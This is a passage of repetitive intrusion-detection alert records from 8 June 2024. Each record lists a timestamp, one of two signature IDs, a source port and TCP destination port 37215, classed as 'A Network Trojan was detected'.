          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157134
          SID:2829579
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176693
          SID:2835222
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111283
          SID:2829579
          Source Port:46000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786586
          SID:2829579
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462670
          SID:2835222
          Source Port:44744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463799
          SID:2835222
          Source Port:51972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274730
          SID:2835222
          Source Port:55542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555227
          SID:2829579
          Source Port:47076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109224
          SID:2835222
          Source Port:35658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603084
          SID:2829579
          Source Port:38434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545888
          SID:2835222
          Source Port:53378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747718
          SID:2829579
          Source Port:40720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464805
          SID:2829579
          Source Port:50890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707276
          SID:2835222
          Source Port:60524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781368
          SID:2835222
          Source Port:56286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600798
          SID:2829579
          Source Port:47176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787214
          SID:2835222
          Source Port:54882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512988
          SID:2829579
          Source Port:49804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175323
          SID:2829579
          Source Port:37456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446861
          SID:2829579
          Source Port:49946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268926
          SID:2829579
          Source Port:39810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016712
          SID:2835222
          Source Port:46618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808790
          SID:2829579
          Source Port:59112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551852
          SID:2829579
          Source Port:51672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179507
          SID:2829579
          Source Port:56388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732038
          SID:2829579
          Source Port:56742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514531
          SID:2835222
          Source Port:36320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172872
          SID:2835222
          Source Port:51380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150204
          SID:2829579
          Source Port:49718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791507
          SID:2829579
          Source Port:46950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039289
          SID:2835222
          Source Port:60558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747467
          SID:2829579
          Source Port:55512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822338
          SID:2835222
          Source Port:33926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353445
          SID:2835222
          Source Port:51898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603189
          SID:2835222
          Source Port:48762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180692
          SID:2829579
          Source Port:49696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884654
          SID:2829579
          Source Port:54454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672794
          SID:2835222
          Source Port:55224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021799
          SID:2835222
          Source Port:54534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043442
          SID:2835222
          Source Port:56200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151124
          SID:2835222
          Source Port:58010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.364884
          SID:2829579
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901905
          SID:2829579
          Source Port:54478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161556
          SID:2835222
          Source Port:49424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107346
          SID:2829579
          Source Port:44836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276273
          SID:2835222
          Source Port:57126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449729
          SID:2829579
          Source Port:52032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513685
          SID:2835222
          Source Port:42938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547929
          SID:2829579
          Source Port:49890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861578
          SID:2829579
          Source Port:46922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038088
          SID:2835222
          Source Port:42862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782828
          SID:2835222
          Source Port:46894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378122
          SID:2829579
          Source Port:41074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187985
          SID:2829579
          Source Port:54298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704370
          SID:2835222
          Source Port:33798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734918
          SID:2829579
          Source Port:39556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036319
          SID:2835222
          Source Port:34264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463170
          SID:2835222
          Source Port:57346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829292
          SID:2829579
          Source Port:50356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733053
          SID:2835222
          Source Port:41306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600366
          SID:2829579
          Source Port:43498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792933
          SID:2829579
          Source Port:41242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808765
          SID:2829579
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513600
          SID:2835222
          Source Port:59094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099398
          SID:2835222
          Source Port:46646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157257
          SID:2829579
          Source Port:42684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894991
          SID:2829579
          Source Port:43712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518182
          SID:2829579
          Source Port:38246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394361
          SID:2829579
          Source Port:39668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037103
          SID:2829579
          Source Port:49890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351176
          SID:2829579
          Source Port:35532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241323
          SID:2835222
          Source Port:55648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892826
          SID:2829579
          Source Port:41090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783687
          SID:2835222
          Source Port:53776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268654
          SID:2835222
          Source Port:39390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467399
          SID:2835222
          Source Port:48154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295054
          SID:2835222
          Source Port:33696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239111
          SID:2829579
          Source Port:48580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353173
          SID:2835222
          Source Port:44366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895097
          SID:2835222
          Source Port:51266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854287
          SID:2829579
          Source Port:46326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180561
          SID:2835222
          Source Port:46126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743419
          SID:2835222
          Source Port:34038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152856
          SID:2835222
          Source Port:53838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707930
          SID:2829579
          Source Port:60896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176100
          SID:2835222
          Source Port:41964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063181
          SID:2829579
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257711
          SID:2829579
          Source Port:45204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237951
          SID:2835222
          Source Port:42574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378505
          SID:2835222
          Source Port:59488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131948
          SID:2835222
          Source Port:48988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841901
          SID:2829579
          Source Port:33394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789088
          SID:2829579
          Source Port:49164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075668
          SID:2835222
          Source Port:52708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441806
          SID:2829579
          Source Port:38506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.791975
          SID:2835222
          Source Port:35062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263774
          SID:2835222
          Source Port:45314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063009
          SID:2835222
          Source Port:43632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159442
          SID:2829579
          Source Port:44566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884701
          SID:2829579
          Source Port:58512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239753
          SID:2835222
          Source Port:48240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515489
          SID:2835222
          Source Port:47558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668586
          SID:2835222
          Source Port:45908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782187
          SID:2835222
          Source Port:39332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601135
          SID:2829579
          Source Port:34276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081691
          SID:2829579
          Source Port:36608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822906
          SID:2829579
          Source Port:41992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811518
          SID:2829579
          Source Port:60704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108674
          SID:2835222
          Source Port:36780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837414
          SID:2835222
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306382
          SID:2835222
          Source Port:51310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671063
          SID:2829579
          Source Port:55986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795280
          SID:2835222
          Source Port:36308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843176
          SID:2829579
          Source Port:36764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707015
          SID:2829579
          Source Port:50754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157059
          SID:2829579
          Source Port:49962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746699
          SID:2829579
          Source Port:47768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465350
          SID:2835222
          Source Port:33962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802838
          SID:2829579
          Source Port:49880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237304
          SID:2829579
          Source Port:42164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706252
          SID:2835222
          Source Port:60794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151472
          SID:2835222
          Source Port:35014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816542
          SID:2835222
          Source Port:33464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175869
          SID:2829579
          Source Port:60922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860092
          SID:2829579
          Source Port:48950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165952
          SID:2829579
          Source Port:36124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395162
          SID:2829579
          Source Port:41166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832304
          SID:2835222
          Source Port:37516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180604
          SID:2829579
          Source Port:59850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157169
          SID:2829579
          Source Port:34006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352930
          SID:2829579
          Source Port:37698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741335
          SID:2835222
          Source Port:55608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463465
          SID:2835222
          Source Port:42152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792433
          SID:2829579
          Source Port:49172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405406
          SID:2829579
          Source Port:37770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601347
          SID:2829579
          Source Port:33490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108363
          SID:2829579
          Source Port:34358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179459
          SID:2835222
          Source Port:47108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191794
          SID:2829579
          Source Port:54386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087380
          SID:2829579
          Source Port:33672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.457396
          SID:2829579
          Source Port:50874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446353
          SID:2835222
          Source Port:56516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401536
          SID:2829579
          Source Port:56098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555183
          SID:2829579
          Source Port:49950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296802
          SID:2829579
          Source Port:50762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148685
          SID:2835222
          Source Port:48604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781422
          SID:2835222
          Source Port:51814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846384
          SID:2835222
          Source Port:44554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466942
          SID:2835222
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152661
          SID:2835222
          Source Port:54128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818775
          SID:2835222
          Source Port:56862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042801
          SID:2835222
          Source Port:48772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732596
          SID:2829579
          Source Port:57488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516620
          SID:2835222
          Source Port:60366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858983
          SID:2835222
          Source Port:49268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741453
          SID:2835222
          Source Port:46028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021096
          SID:2829579
          Source Port:53476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824933
          SID:2829579
          Source Port:51490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018892
          SID:2835222
          Source Port:59052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108934
          SID:2835222
          Source Port:38868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355024
          SID:2835222
          Source Port:47426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191982
          SID:2829579
          Source Port:46184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148605
          SID:2835222
          Source Port:42660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514287
          SID:2829579
          Source Port:51138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157443
          SID:2829579
          Source Port:38752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806369
          SID:2835222
          Source Port:34664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164339
          SID:2829579
          Source Port:39956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817017
          SID:2835222
          Source Port:53556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038968
          SID:2829579
          Source Port:48450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731247
          SID:2835222
          Source Port:54338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731108
          SID:2829579
          Source Port:36490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183942
          SID:2829579
          Source Port:45504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745401
          SID:2835222
          Source Port:39600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861851
          SID:2829579
          Source Port:47628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153874
          SID:2829579
          Source Port:45492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157297
          SID:2829579
          Source Port:36856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114137
          SID:2835222
          Source Port:53178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114040
          SID:2835222
          Source Port:48458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107155
          SID:2835222
          Source Port:35170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043611
          SID:2835222
          Source Port:40520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401962
          SID:2835222
          Source Port:35450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509991
          SID:2835222
          Source Port:58714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837326
          SID:2829579
          Source Port:60648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799555
          SID:2829579
          Source Port:52068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442007
          SID:2829579
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264110
          SID:2829579
          Source Port:49272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.045016
          SID:2835222
          Source Port:39020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551797
          SID:2835222
          Source Port:51010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152885
          SID:2829579
          Source Port:33480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158673
          SID:2835222
          Source Port:59922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160888
          SID:2829579
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.847134
          SID:2829579
          Source Port:40190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242754
          SID:2829579
          Source Port:54300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704897
          SID:2835222
          Source Port:34766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405220
          SID:2829579
          Source Port:34178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018181
          SID:2829579
          Source Port:60370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262595
          SID:2835222
          Source Port:51424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
